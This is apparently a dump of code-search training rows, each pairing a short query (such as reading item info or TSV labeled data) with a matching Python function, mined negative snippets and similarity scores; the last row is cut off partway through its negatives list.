| query (string, 9–9.05k chars) | document (string, 10–222k chars) | metadata (dict) | negatives (list, length 30) | negative_scores (list, length 30) | document_score (string, 4–10 chars) | document_rank (2 classes) |
---|---|---|---|---|---|---|
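Each row pairs a natural-language query with one positive code document, 30 mined negative documents, and their similarity scores. As a minimal sketch for consuming such a dump (assuming the rows are exported as JSON Lines with exactly these field names; the file name triplets.jsonl is hypothetical):

import json

def load_rows(path="triplets.jsonl"):  # hypothetical export of this dataset
    # Yield one row per JSON line: query, document, metadata, negatives,
    # negative_scores, document_score, document_rank.
    with open(path, "r", encoding="utf-8") as f:
        for line in f:
            line = line.strip()
            if line:
                yield json.loads(line)

# Example: print the query and negative count of the first row.
# for row in load_rows():
#     print(row["query"], len(row["negatives"]))
#     break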
gets item info based on user input
|
def item_info():
    item_code = get_input("Enter item code: ")
    if item_code in FULL_INVENTORY:
        print_dict = FULL_INVENTORY[item_code]
        output = ""
        for key, value in print_dict.items():
            output += ("{}:{}{}".format(key, value, "\n"))
    else:
        output = "Item not found in inventory"
    print(output)
    return output
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def iteminfo():\n itemcode = input(\"Enter item code: \")\n if itemcode in FULLINVENTORY:\n printdict = FULLINVENTORY[itemcode]\n for key, value in printdict.items():\n print(\"{}:{}\".format(key, value))\n else:\n print(\"Item not found in inventory\")",
"def item(self, item_name):\n\tself.log.info('Not implemented yet... Sorry!')\n\tpass",
"def getInfo(self,item):\r\n return ''",
"async def iteminfo(self, ctx, *, item: str):\n items = await self.bot.di.get_guild_items(ctx.guild)\n item = items.get(item)\n if not item:\n await ctx.send(await _(ctx, \"Item doesnt exist!\"))\n return\n if hasattr(item, \"description\"):\n embed = discord.Embed(title=item.name, description=item.description, color=randint(0, 0xFFFFFF),)\n else:\n embed = discord.Embed(title=item.name, color=randint(0, 0xFFFFFF),)\n\n embed.set_author(name=ctx.guild.name, icon_url=ctx.guild.icon_url)\n embed.add_field(name=await _(ctx, \"Name\"), value=item.name)\n img = item.meta.get(\"image\")\n embed.set_thumbnail(url=str(img)) if img else None\n for key, value in item.meta.items():\n if key == \"image\":\n continue\n embed.add_field(name=key, value=value)\n\n await ctx.send(embed=embed)",
"def get_item_input(self, varname, collection):\n item = self.get_ascii_input(varname)\n if item not in collection:\n raise MKUserError(varname, _(\"The requested item %s does not exist\") % item)\n return collection[item], item",
"def do_list_items(self, arg):\n try:\n cprint (\"These are your items: \\n\", 'blue')\n my_items = arg[\"<all_items>\"]\n choice = arg[\"--choice\"]\n if choice == \"name\":\n my_items_str = \" \".join(my_items)\n print(my_items_str)\n elif choice == \"id\":\n my_items_str = int(\" \".join(my_items))\n print (my_items_str)\n app.ToDoApp.to_view_items(my_items_str)\n \n\n\n \n except ValueError as e:\n cprint((e), 'red')",
"def __getitem__(self, item):\n result = self._get_raw_input()[item]\n return result[0] if isinstance(result, list) else result",
"def get_item_detail(item_id):\n pass",
"def choose_item():\n print_items()\n print(\"Type 'back' to go to main menu.\")\n print(\"You can view map by typing in 'blueprint'\")\n while True:\n item_choice = player_choice(\"\")\n if item_choice == 'back':\n break\n elif item_choice in inventory:\n if item_choice == 'blueprint':\n blueprint = ViewMap()\n blueprint.print_map()\n print(\"Type 'back' to go to main menu.\")\n else:\n print(\"Type 'back' to go to main menu.\")\n print(\"You can view map by typing in 'blueprint'\")\n else:\n print(\"Type 'back' to go to main menu.\")",
"def parse_item_page_info(self, id, body):\n info = {}\n info['title'] = self.__re_search(body, *self.regx['title'])\n if info['title'] == 'Suggested Products':\n return None\n info['model'] = self.__re_search(body, *self.regx['model'])\n if self.__re_search(body, *self.regx['deactivated']):\n info['deactivated'] = True\n return info\n free_shipping = self.__re_search(body, *self.regx['free_shipping'])\n cart = self.__re_search(body, *self.regx['cart'])\n if free_shipping and not cart:\n info.update(self.parse_item_page_price(id, body))\n return info",
"def read_item(item_name, catagory_name):\n item = Item.fetch_by_name_and_catagory_name(item_name, catagory_name)\n return render_template('item.html', item=item)",
"def get_item_info(self, item_id):\n request_name = \"get_shop_info\"\n\n items = self.make_request(request_name, url_id=item_id)\n try:\n item = items[0]\n item_dict = dict()\n item_dict[\"id\"] = item[\"@id\"].encode('utf-8')\n item_dict[\"name\"] = item[\"label\"].encode('utf-8')\n item_dict[\"shelf\"] = item[\"shelf\"].encode('utf-8')\n item_dict[\"slot\"] = item[\"slot\"].encode('utf-8')\n item_dict[\"quantity\"] = item[\"quantity\"]\n return item_dict\n except Exception as e:\n print(\"Encountered exception while getting item\", item_id, \"\\n\", str(e))\n return None",
"def selectItem(*args):",
"def Restaurant_get_info() -> Restaurant:\r\n name = input(\"Please enter the restaurant's name: \")\r\n cuisine = input(\"Please enter the kind of food served: \")\r\n phone = input(\"Please enter the phone number: \")\r\n menu = menu_enter()\r\n return Restaurant(name, cuisine, phone, menu)",
"def choose_inventory() -> list:\r\n print(\"What weapon would you like to start with? Enter the corresponding number\\n(1) Blaster Pistol\\n\"\r\n \"(2) Blaster Rifle\\n(3) Assault Cannon\\n(4) Sniper Rifle\\n\")\r\n item_list = [\"Blaster Pistol\", \"Blaster Rifle\", \"Assault Cannon\", \"Sniper Rifle\"]\r\n user_input = str(input())\r\n if user_input == \"1\":\r\n return [item_list[0]]\r\n elif user_input == \"2\":\r\n return [item_list[1]]\r\n elif user_input == \"3\":\r\n return [item_list[2]]\r\n elif user_input == \"4\":\r\n return [item_list[3]]\r\n else:\r\n print(\"Please enter a valid item number\")\r\n choose_inventory()",
"def process_items():\n global HAS_WATCH\n global HAS_FIRST_AID_KIT\n global HAS_FLASHLIGHT\n global HAS_RAINCOAT\n global HAS_COMPASS\n global HAS_BEARTRAP\n\n if \"Watch\" in ITEMS:\n HAS_WATCH = True\n if \"First Aid Kit\" in ITEMS:\n HAS_FIRST_AID_KIT = True\n if \"Flashlight\" in ITEMS:\n HAS_FLASHLIGHT = True\n if \"Raincoat\" in ITEMS:\n HAS_RAINCOAT = True\n if \"Compass\" in ITEMS:\n HAS_COMPASS = True\n if \"Bear Trap\" in ITEMS:\n HAS_BEARTRAP = True\n\n # Stupid little hack to provide 'immediate updates/effect' of having the below items\n if HAS_WATCH:\n update_title_area(\" Day: %d Time: %d:00 \" % (DAY, TIME))\n if HAS_COMPASS:\n DISCOVERED[ZERO_BASE_PLYR_POS] = \"Y\"",
"def main():\n catalogue = Catalogue()\n\n # book1 = Book(\"title1\", 22323, \"author\", 4)\n # dvd1 = Dvd(\"dvdt\", 1111, \"jurassic\", 2, \"sept 2\", \"japan\")\n # catalogue.add_item(book1)\n # catalogue.add_item(dvd1)\n\n while True:\n print(\"\"\" ======LIBRARY MENU=======\n 1. Add Item\n 2. Remove item \n 3. Display all items\n 4. Checkout item \n 5. Return item \n 6. Find item \n 7. Exit\n \"\"\")\n choice = int(input(\"Enter Choice:\"))\n if choice == 1:\n catalogue.add_item(catalogue)\n elif choice == 2:\n user_input = int(input(\"enter call number: \"))\n catalogue.remove_item(user_input)\n elif choice == 3:\n catalogue.display_available_items()\n elif choice == 4:\n user_input = int(input(\"enter call number: \"))\n catalogue.check_out(user_input)\n elif choice == 5:\n user_input = int(input(\"enter call number: \"))\n catalogue.return_item(user_input)\n elif choice == 6:\n user_input = input(\"enter title to search: \").capitalize()\n catalogue.search(user_input)\n if choice == 7:\n sys.exit()",
"def find_item(self, utterance, rasa_output):\n item = \"\" # This is the variable that will hold the item\n split_utterance = utterance.lower().split(\" \") # Split the user's input\n split_rasa_output = \" \".join(rasa_output.lower().split(\"?\")).split(\" \") # Split Rasa's output\n\n items = [item for item in split_rasa_output if item == \"music\" \n or item == \"heating\" or item == \"tv\" or item == \"light\"] # Identify the relevant items from Rasa's output]\n # Identifies the item to be chosen from the user input\n if (\"music\" in split_utterance):\n item = \"music\"\n elif (\"tv\" in split_utterance or \"television\" in split_utterance or \"telly\" in split_utterance):\n item = \"tv\"\n elif (\"heating\" in split_utterance):\n item = \"heating\"\n elif (\"lights\" in split_utterance or \"light\" in split_utterance):\n item = \"lights\"\n elif (\"first\" in split_utterance): \n item = items[0]\n elif (\"second\" in split_utterance): \n item = items[1]\n elif (\"third\" in split_utterance or \"last\" in split_utterance): \n item = items[2]\n else:\n return None\n\n return item",
"def execute_factory_menu(cls) -> LibraryItemFactory:\n print(\"Item Loader\")\n print(\"-----------\")\n print(\"What kind of items would you like to load?\")\n print(\"1. Manga\")\n print(\"2. Games\")\n print(\"3. Movies\")\n user_choice = int(input(\"Enter your choice (1-3):\"))\n factory = cls.factory_map[user_choice]\n path = input(\"Enter a path: \")\n return factory(path)",
"def item():\n return {'name':'box',\n 'value':340}",
"def parse_items(self):",
"def Item(self) -> str:",
"def Item(self) -> str:",
"def Item(self) -> str:",
"def get_menu_item(menu_item_name):\n\n pass",
"def test_get_item_details(self, mock_requests_get):\n details = resources.get_item_details(21787)\n\n item = details.item\n assert item.id == 21787\n assert item.name == \"Steadfast boots\"\n assert item.type == \"Miscellaneous\"\n assert item.current.price == 5900000\n assert item.today.price == -138200\n assert item.members is True",
"def request_item(date_in, loc_in, item_in, meal_in, requisites):\n secrets = get_secrets()\n url = secrets.get('m_dining_api_main')\n location = '&location='\n date = '&date='\n meal = '&meal='\n\n #API url concatenation\n location += loc_in\n date += str(date_in)\n url = url + location + date + meal\n url = remove_spaces(url)\n\n if meal_in == '':\n meal_entered = False\n else:\n meal_entered = True\n\n #fetching json\n data = requests.get(url).json()\n\n possible_matches = []\n\n #Loop through meals\n for i in data['menu']['meal']:\n\n #If meal specified, only check specified meal\n if meal_entered and i['name'].upper() != meal_in.upper():\n continue\n #Skip meal if no food items available\n if 'course' not in i:\n continue\n\n #Loop through food items in course\n for j in i['course']:\n for key, value in j.items():\n if key == 'name':\n course_data = j['menuitem']\n meal_name = i['name']\n #Append matches to specified item to possible_matches list\n possible_matches = find_matches(course_data, possible_matches,\n item_in, meal_name, requisites)\n \n #Specified item found\n if possible_matches:\n possible_matches = find_item_formatting(possible_matches)\n text = 'Yes, there is '\n for i in range(len(possible_matches)):\n if len(possible_matches) > 1 and (i == len(possible_matches) - 1):\n text += ' and'\n text += ' ' + possible_matches[i]\n if i != len(possible_matches) - 1:\n text += ','\n\n #Specified item not found\n else:\n text = 'Sorry, that is not available'\n\n\n return {'fulfillmentText': text}",
"def getItemFromAisle(self):\n category_items = {\"0\": None}\n choice = None\n\n # While not exit\n while choice != \"0\": \n self.cart.refreshCartDF()\n self.updateAisleData()\n \n # Add items from a category into a dictionary to refer to.\n for i, item in enumerate(self.aisle_data.values):\n category_items[f\"{i+1}\"] = [item[0], item[1], int(item[2])] #[Item, price, stock]\n clear()\n\n \"\"\"\n 0) Don't add item to cart\n\n Items Price In stock\n 1) Chicken $5.20 14\n \"\"\"\n print(print_banner(self.name, self.aisle_name))\n print(\"The items on the shelves stare back at you...\")\n print(\"0) Don't add item to cart\\n\")\n print(\" Items Price In stock\")\n for i, item in enumerate(self.aisle_data.values):\n # option_num) Item, price, stock\n print(f\"{i+1}) {item[0]}{get_spaces(12-len(item[0]))} ${item[1]}{get_spaces(7-len(str(item[1])))} {int(item[2])}\") \n\n choice = input(\"\\nAdd an item to cart?\\n\")\n clear()\n print(print_banner(self.name, self.aisle_name))\n if choice == \"\":\n print(\"Please enter something!\")\n elif choice == \"0\":\n break\n elif choice in category_items: # Item chosen to add to cart\n while True: # Check if valid number added to cart\n clear()\n print(print_banner(self.name, self.aisle_name))\n print(f\"Selected item: \\033[1;33;40m{category_items[choice][0]} ({category_items[choice][2]})\\033[0;37;40m\\n\")\n amt = input(\"Number to add (0 to stop): \").strip()\n\n if amt == \"\" :\n print(\"Please enter an amount!\")\n enter_to_continue()\n continue\n elif amt.isnumeric():\n amt = int(amt)\n else:\n amt = -1\n if amt > category_items[choice][2]:\n print(\"That's too many!\")\n enter_to_continue()\n continue\n elif amt >= 0:\n break\n print(\"Invalid option!\")\n enter_to_continue()\n if amt == 0: # Don't add anything\n pass\n else:\n category_items[choice][2] -= amt\n self.cart.addItemToCart(category_items[choice][0], amt, category_items[choice][1]*amt, get_time())\n print(f\"Added {amt} {category_items[choice][0]} to cart\")\n enter_to_continue()\n else:\n print(\"Invalid option!\")\n enter_to_continue()",
"def getListItem(*args):",
"def getListItem(*args):"
] |
[
"0.7300795",
"0.67402464",
"0.6617127",
"0.65622824",
"0.62993705",
"0.6286386",
"0.6192564",
"0.6170643",
"0.61119014",
"0.61083364",
"0.61015826",
"0.6098515",
"0.6002422",
"0.60008955",
"0.5988962",
"0.5985847",
"0.59783155",
"0.5960772",
"0.5948382",
"0.59276307",
"0.59144765",
"0.59136546",
"0.59136546",
"0.59136546",
"0.59112847",
"0.59052825",
"0.58933926",
"0.5890285",
"0.588357",
"0.588357"
] |
0.7121636
|
1
|
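The objective block in each row marks the data for a (query, document, negatives) triplet objective, so a row expands naturally into training triplets. A minimal sketch, assuming row is one loaded row as a dict with the fields above; keeping the highest-scoring negatives first is one possible hard-negative heuristic, not something the dump prescribes:

def row_to_triplets(row, max_negatives=5):
    # Pair each negative with its score and take the highest-scoring
    # (hardest) negatives first.
    scored = sorted(
        zip(row["negatives"], map(float, row["negative_scores"])),
        key=lambda pair: pair[1],
        reverse=True,
    )
    # One (anchor query, positive document, negative document) triplet
    # per kept negative.
    return [
        (row["query"], row["document"], negative)
        for negative, _score in scored[:max_negatives]
    ]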
Reads the labeled data described in a TSV file. The returned object contains three fields that represent the labeled data.
|
def read_tsv(data_loc, fname):
    tf = codecs.open(data_loc + fname, 'r', encoding='utf-8')
    data = []
    labels = []
    fnames = []
    for line in tf:
        (ifname, label) = line.strip().split("\t")
        content = read_instance(data_loc, ifname)
        labels.append(label)
        fnames.append(ifname)
        data.append(content)
    tf.close()
    return data, fnames, labels
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def load_from_tsv(tsv_file):\n # Load data from files\n all_examples = list(open(tsv_file, \"r\", encoding='utf-8').readlines())\n split_lines = [l.split('\\t') for l in all_examples]\n x_text = [clean_str(s[0].strip()) for s in split_lines]\n label_integers = [int(s[1].strip()) for s in split_lines]\n label_values = list(set(label_integers))\n if len(label_values) > 2 or min(label_values) != 0 or max(label_values) != 1:\n raise Exception('Labels are not in correct format {0} {1}'.format(label_values[0], label_values[1]))\n y = np.array([[0, 1] if l == 1 else [1, 0] for l in label_integers])\n return [x_text, y]",
"def load_data():\n categories = {}\n\n # Sorry: This is lazy file reading.\n f = open(TSV, 'r')\n for line in f.readlines()[1:]:\n line = line.strip()\n\n if not line or line.startswith(('id', '#')):\n continue\n\n # It's tab-delimited, so split on tabs.\n line = line.split('\\t')\n categories.setdefault(line[1], []).append(line)\n\n return categories",
"def read_tsv(path):\n return pd.read_csv(path, sep=\"\\t\", index_col=0)",
"def load_data(self):\n with open(self.file_name) as f:\n lines = f.readlines()\n\n labels = list()\n all_dat = list()\n for i, l in enumerate(lines):\n\n labels.append(int(l[0]))\n\n l = gensim.utils.any2unicode(l)\n all_dat.append(LabeledSentence(l.split(\"\\t\")[-1], [i]))\n\n return all_dat, np.asarray(labels)",
"def _read_tsv(cls, input_file):\n with open(input_file, \"r\", encoding=\"cp1252\") as f:\n pre_lines = f.readlines()\n post_lines = []\n for line in pre_lines:\n post_lines.append(line.strip().split(\"\\t\"))\n return post_lines",
"def read_data(feature_file, label_file):",
"def readdata(self, fname):\n\t\treturn self.__readtsv(fname)",
"def _read_tsv(cls, input_file, quotechar='\"'):\n with tf.gfile.Open(input_file, \"r\") as f:\n reader = csv.reader(f, delimiter=\"\\t\", quotechar=quotechar)\n lines = []\n for line in reader:\n lines.append(line)\n return lines",
"def _read_tsv(cls, input_file, quotechar=None):\n with tf.gfile.Open(input_file,\"r\") as f:\n reader = csv.reader(f,delimiter=\"\\t\", quotechar=quotechar)\n lines = []\n for line in reader:\n lines.append(line)\n return lines",
"def _read_tsv(cls, input_file, quotechar=None):\n return readfile(input_file)",
"def _read_tsv(cls, input_file, quotechar=None):\n with tf.gfile.Open(input_file, \"r\") as f:\n reader = csv.reader(f, delimiter=\"\\t\", quotechar=quotechar)\n lines = []\n for line in reader:\n lines.append(line)\n return lines",
"def load_x_from_tsv(tsv_file):\n # Load data from files\n all_examples = list(open(tsv_file, \"r\", encoding='utf-8').readlines())\n split_lines = [l.split('\\t') for l in all_examples]\n x_text = [clean_str(s[0].strip()) for s in split_lines]\n return x_text",
"def load_rd_uv(in_file):\n uv_data = np.load(in_file)\n return uv_data['ucs'], uv_data['vcs']",
"def load_tsv(path: str, ncols: int, nonames: bool) -> DataFrame:\n cols = range(ncols) if ncols else None\n return pandas.read_csv(path, usecols=cols, sep='\\t', skipinitialspace=True, header='infer' if not nonames else None)",
"def _parse_tsv_vocab_file(self, vocab_file: str):\n with open(vocab_file, \"r\", encoding=\"utf-8\") as f:\n for (index, line) in enumerate(f):\n title, count = line.rstrip().split(\"\\t\")\n entity = Entity(title, None)\n self.vocab[entity] = index\n self.counter[entity] = int(count)\n self.inv_vocab[index] = [entity]",
"def _read_node_file(self):\n self.node_df = gt.remove_colons(pd.read_csv(self.node_file, dtype=str))",
"def from_label_file(cls, label_file_path, out_path=FEATURES_DATA_PATH, source_path=RAW_DATA_PATH):\n df = pd.read_csv(label_file_path)\n filenames = df['filename']\n labels = df['label']\n return cls(filenames, labels, out_path=out_path, source_path=source_path)",
"def _read_tsv(file_path):\n translation_pairs = []\n with file_path.open() as f:\n # Note: the correct way to do this is with csv.DictReader, but some examples\n # have quote characters that confuse the csv parser. Since we know the\n # source never has its own tab or newline characters, basic Python string\n # manipulation is fine here, as long as the model doesn't predict tabs or\n # newlines.\n for line in f:\n line = line.strip()\n line = line.split('\\t')\n if len(line) != 2:\n raise ValueError(\n f'Line {line} could not be parsed. You may need to manually '\n 'replace tab or newline characters in the model output with '\n 'spaces.'\n )\n source, translation = line\n translation_pairs.append(\n evaluation.TranslationPair(source=source, translation=translation)\n )\n return translation_pairs",
"def load_data(self):\n \n # only loader implemented so far !\n try:\n _ascii_array = Utilities.load_ascii(filename=self.filename, sep='')\n start_row = TOF._first_line_number_with_real_data(_ascii_array[0, 0])\n\n _tof_column = _ascii_array[start_row:, 0]\n\n if not TOF._is_this_numeric(_tof_column[0]):\n start_row += 1\n\n _tof_column = _ascii_array[start_row:, 0]\n _counts_column = _ascii_array[start_row:, 1]\n\n self.tof_array = _tof_column\n self.counts_array = _counts_column\n return\n\n except IndexError:\n pass # try another format\n\n try:\n _ascii_array = Utilities.load_ascii(filename=self.filename, sep=',')\n start_row = TOF._first_line_number_with_real_data(_ascii_array[0, 0])\n\n _tof_column = _ascii_array[start_row:, 0] # first row must be excluded in this format\n\n if not TOF._is_this_numeric(_tof_column[0]):\n start_row += 1\n\n _tof_column = _ascii_array[start_row:, 0]\n _counts_column = _ascii_array[start_row:, 1]\n\n self.tof_array = _tof_column\n self.counts_array = _counts_column\n return\n\n except IndexError:\n raise IndexError(\"Format not implemented!\")",
"def _read_tsv(cls, input_file, quotechar=None):\n df = pd.read_csv(input_file, sep=\"\\t\", header=None)\n return df.values.tolist()",
"def data_parser(data):\n\n with open(data, 'r') as inp:\n\n # take every sample\n # the last line in the text file is empty, so reading until -1\n samples = inp.read().split('\\n')[:-1]\n\n vec = []\n labels = []\n for sample in samples:\n # file is tab delimited\n split_samples = sample.split('\\t')\n # last column contains the label\n labels.append(int(split_samples[-1]))\n\n features = []\n for feature in split_samples[:-1]:\n features.append(float(feature))\n vec.append(features)\n\n # make the features and labels as a numpy array\n vec = np.array(vec)\n labels = np.array(labels)\n return vec, labels",
"def _read_local(self):\n\n self.attributions = np.genfromtxt(\n self.attributions_path, dtype=float, delimiter=\",\", skip_header=1\n )\n\n with open(self.attributions_path) as attribution_file:\n self.feature_labels = next(csv.reader(attribution_file))",
"def _read_tsv(cls, input_file, quotechar=None):\n with open(input_file, \"r\", encoding='utf-8') as f:\n # reader = csv.reader(f, delimiter=\"\\t\", quotechar=quotechar)\n lines = []\n for line in f.readlines():\n # if sys.version_info[0] == 2:\n # line = list(cell.decode('utf-8') for cell in line)\n lines.append(line.strip().split('\\t'))\n return lines",
"def read_sensaldo(tsv=\"sensaldo-base-v02.txt\", verbose=True):\n\n if verbose:\n util.log.info(\"Reading TSV lexicon\")\n lexicon = {}\n\n with open(tsv) as f:\n for line in f:\n if line.lstrip().startswith(\"#\"):\n continue\n saldoid, label = line.split()\n lexicon[saldoid] = label\n\n testwords = [\"förskräcklig..1\",\n \"ödmjukhet..1\",\n \"handla..1\"\n ]\n util.test_annotations(lexicon, testwords)\n\n if verbose:\n util.log.info(\"OK, read\")\n return lexicon",
"def tsv_value(self):\n return self.tsv_file.getvalue()",
"def _read_tsv(cls, input_file, quotechar=None):\n with open(input_file, \"r\", encoding='utf-8') as f:\n reader = csv.reader(f, delimiter=\"\\t\", quotechar=quotechar)\n lines = []\n for line in reader:\n lines.append(line)\n return lines",
"def _read_tsv(cls, input_file, quotechar=None):\n with open(input_file, \"r\", encoding=\"utf-8-sig\") as f:\n reader = csv.reader(f, delimiter=\"\\t\", quotechar=quotechar)\n lines = []\n for line in reader:\n # if sys.version_info[0] == 2:\n # line = list(unicode(cell, 'utf-8') for cell in line)\n lines.append(line)\n return lines",
"def load_data_part(fname):\n if \"_data\" not in fname:\n return None\n # Read data\n data = pd.read_csv(fname)\n # events file\n events_fname = fname.replace('_data', '_events')\n # read event file\n labels = pd.read_csv(events_fname)\n clean = data.drop(['id'], axis=1) # remove id\n labels = labels.drop(['id'], axis=1) # remove id\n return clean, labels",
"def read_unlabeled(data_loc, dname):\n data = []\n fnames = []\n raw_fnames = os.listdir(data_loc + dname)\n for raw_fname in raw_fnames:\n fname = dname + '/' + raw_fname\n content = read_instance(data_loc, fname)\n data.append(content)\n fnames.append(fname)\n return data, fnames",
"def _read_tsv(cls, input_file, quotechar=None):\r\n with open(input_file, \"r\", encoding='utf-8') as f:\r\n reader = csv.reader(f, delimiter=\"\\t\", quotechar=quotechar)\r\n lines = []\r\n for line in reader:\r\n lines.append(line)\r\n return lines"
] |
[
"0.6495935",
"0.5876787",
"0.586421",
"0.5856266",
"0.5749008",
"0.57244563",
"0.57199895",
"0.57068723",
"0.56794715",
"0.56793076",
"0.56583524",
"0.5629123",
"0.5584531",
"0.55555147",
"0.5524185",
"0.5507425",
"0.5448873",
"0.54281646",
"0.542447",
"0.541013",
"0.540003",
"0.53788555",
"0.5376533",
"0.53414196",
"0.53319013",
"0.53302175",
"0.5314296",
"0.5304937",
"0.53040534",
"0.530193"
] |
0.6444849
|
1
|
Reads the unlabeled data. The returned object contains two fields that represent the unlabeled data.
|
def read_unlabeled(data_loc, dname):
    data = []
    fnames = []
    raw_fnames = os.listdir(data_loc + dname)
    for raw_fname in raw_fnames:
        fname = dname + '/' + raw_fname
        content = read_instance(data_loc, fname)
        data.append(content)
        fnames.append(fname)
    return data, fnames
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def _load_unlabeled(self, path):\n signal, info = wfdb.rdsamp(path)\n self.fs = 250\n self.lead_match = ['anonymous1', 'anonymous2']\n self.raw_data = np.transpose(np.array([signal]), (2, 0, 1))\n self.symbol = []\n self.coords = []\n self.label_name = None\n self._generate_beatlabel_from_estimation()",
"def _read_train_datas(self):\r\n with open(self.train_label_path, 'r') as fb:\r\n lines = fb.readlines()\r\n return self._parse_raw_labels(lines)",
"def get_raw_data():\n\twith open('train_label.pkl', 'rb') as f:\n\t\ttrain_label = pickle.load(f)\n\n\twith open('train_image.pkl', 'rb') as f:\n\t\ttrain_data = pickle.load(f)\n\n\tprint(np.unique(np.asarray(train_label)))\n\n\treturn (train_label, np.asarray(train_data))",
"def read_raw_data(self):\n dat_file = os.path.join(DATA_DIR, self.patient_number + '.txt')\n if not os.path.exists(dat_file):\n raise AssertionError(\"{} doesn't exist.\".format(dat_file))\n time = []\n voltage1 = []\n voltage2 = []\n with open(dat_file, 'r') as fd:\n for line in fd:\n line = line.split()\n time.append(line[0])\n voltage1.append(float(line[1]))\n voltage2.append(float(line[2]))\n\n tags_file = os.path.join(DATA_DIR, self.patient_number + '_tag.txt')\n if not os.path.exists(dat_file):\n raise AssertionError(\"{} doesn't exist.\".format(tags_file))\n tags_time = []\n tags = []\n r_peaks_indexes = []\n with open(tags_file, 'r') as fd:\n for line in fd:\n line = line.split()\n tags_time.append(line[0])\n tags.append(line[2])\n r_peaks_indexes.append(int(line[1]))\n return time, voltage1, voltage2, tags_time, tags, r_peaks_indexes",
"def read_data(feature_file, label_file):",
"def load_data(self):\n with open(self.file_name) as f:\n lines = f.readlines()\n\n labels = list()\n all_dat = list()\n for i, l in enumerate(lines):\n\n labels.append(int(l[0]))\n\n l = gensim.utils.any2unicode(l)\n all_dat.append(LabeledSentence(l.split(\"\\t\")[-1], [i]))\n\n return all_dat, np.asarray(labels)",
"def _read_local(self):\n\n self.attributions = np.genfromtxt(\n self.attributions_path, dtype=float, delimiter=\",\", skip_header=1\n )\n\n with open(self.attributions_path) as attribution_file:\n self.feature_labels = next(csv.reader(attribution_file))",
"def read_data(filename):\r\n with open(filename,'rb') as f:\r\n data = pk.load(f,encoding='bytes')\r\n return data[b'data'],data[b'labels']",
"def get_labels(self):\n\n print 'Loading label data from', self.label_file, '...'\n labels = {}\n with open(self.label_file, 'rb') as f:\n f.next() # skip header line\n for line in f:\n index, answer = line.rstrip('\\n').split(',')\n labels[index] = answer\n\n return labels",
"def get_labeled_data(imagefile, labelfile):\n # Open the images with gzip in read binary mode\n images = open(imagefile, 'rb')\n labels = open(labelfile, 'rb')\n\n # Read the binary data\n # We have to get big endian unsigned int. So we need '>I'\n\n # Get metadata for images\n images.read(4) # skip the magic_number\n number_of_images = images.read(4)\n number_of_images = unpack('>I', number_of_images)[0]\n rows = images.read(4)\n rows = unpack('>I', rows)[0]\n cols = images.read(4)\n cols = unpack('>I', cols)[0]\n\n # Get metadata for labels\n labels.read(4) # skip the magic_number\n N = labels.read(4)\n N = unpack('>I', N)[0]\n\n if number_of_images != N:\n raise Exception('number of labels did not match the number of images')\n\n # Get the data\n X = np.zeros((N, rows * cols), dtype=np.uint8) # Initialize numpy array\n y = np.zeros(N, dtype=np.uint8) # Initialize numpy array\n for i in range(N):\n for id in range(rows * cols):\n tmp_pixel = images.read(1) # Just a single byte\n tmp_pixel = unpack('>B', tmp_pixel)[0]\n X[i][id] = tmp_pixel\n tmp_label = labels.read(1)\n y[i] = unpack('>B', tmp_label)[0]\n return (X, y)",
"def get_labeled_data(imagefile, labelfile):\n # Open the images with gzip in read binary mode\n images = open(imagefile, 'rb')\n labels = open(labelfile, 'rb')\n\n # Read the binary data\n # We have to get big endian unsigned int. So we need '>I'\n\n # Get metadata for images\n images.read(4) # skip the magic_number\n number_of_images = images.read(4)\n number_of_images = unpack('>I', number_of_images)[0]\n rows = images.read(4)\n rows = unpack('>I', rows)[0]\n cols = images.read(4)\n cols = unpack('>I', cols)[0]\n\n # Get metadata for labels\n labels.read(4) # skip the magic_number\n N = labels.read(4)\n N = unpack('>I', N)[0]\n\n if number_of_images != N:\n raise Exception('number of labels did not match the number of images')\n\n # Get the data\n X = np.zeros((N, rows * cols), dtype=np.uint8) # Initialize numpy array\n y = np.zeros(N, dtype=np.uint8) # Initialize numpy array\n for i in range(N):\n for id in range(rows * cols):\n tmp_pixel = images.read(1) # Just a single byte\n tmp_pixel = unpack('>B', tmp_pixel)[0]\n X[i][id] = tmp_pixel\n tmp_label = labels.read(1)\n y[i] = unpack('>B', tmp_label)[0]\n return (X, y)",
"def test_read_data_unlabeled(self):\n references = pre.read_data(self.testfilename)\n truth = [\n [Reference(0, 'm jones', \n 'symbol intersect detect method improv spatial intersect join', \n ['e rundensteiner', 'y huang'], 'geoinformatica', None),\n Reference(1, 'matthew c jones', \n 'improv spatial intersect join symbol intersect detect', \n ['e rundensteiner', 'h kuno', 'p marron', 'v taube', 'y ra'], \n 'sigmodels.intern manag data', None),\n Reference(2, 'matthew c jones',\n 'view materi techniqu complex hirarch object', ['e rundensteiner',\n 'y huang'], 'ssd symposium larg spatial databas', None)],\n [Reference(3, 'mike w miller', 'domin draw bipartit graph', \n ['l berg'], 'sigucc special interest group univers comput servic',\n None),\n Reference(4, 'mike w miller', 'rel compromis statist databas', \n [], 'sigucc special interest group univers comput servic', None)],\n [Reference(5, 'c chen', 'formal approach scenario analysi',\n ['d kung', 'j samuel', 'j gao', 'p hsia', 'y toyoshima'],\n 'ieee softwar', None)],\n [Reference(6, 'jane j robinson', 'discours code clue context', [], \n 'acl meet the associ comput linguist', None),\n Reference(7, 'jane j robinson', 'diagram grammar dialogu', [],\n 'cooper interfac inform system', None)],\n [Reference(8, 'a gupta', 'iri h java distanc educ', ['a gonzalez', \n 'a hamid', 'c overstreet', 'h wahab', 'j wild', 'k maly', 's ghanem',\n 'x zhu'], 'acm journal educ resourc comput', None)],\n [Reference(9, 'mary d brown',\n 'intern redund represent limit bypass support pipelin adder regist'\n 'file', ['y patt'], 'proceed the th ieee intern symposium high '\n 'perform comput architectur hpca intern symposium high perform '\n 'comput architectur talk slide', None)]]\n self.assertEquals(references, truth)",
